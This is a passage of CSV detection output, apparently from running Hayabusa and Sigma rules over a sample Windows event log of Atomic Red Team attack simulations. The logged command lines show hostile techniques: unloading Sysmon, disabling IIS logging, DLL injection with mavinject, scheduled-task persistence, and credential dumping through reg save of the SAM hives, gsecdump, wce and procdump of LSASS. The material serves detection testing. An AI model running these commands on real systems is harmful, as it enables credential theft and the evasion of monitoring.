c:\file.exe file.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll : Path: C:\Windows\System32\mavinject.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT : Command: at 13:20 /interactive cmd : Path: C:\Windows\System32\at.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT 
Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : 
Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a -c : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a Java : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent 
Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell 
Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\sam sam : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam 
sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\system system : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\security security : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals 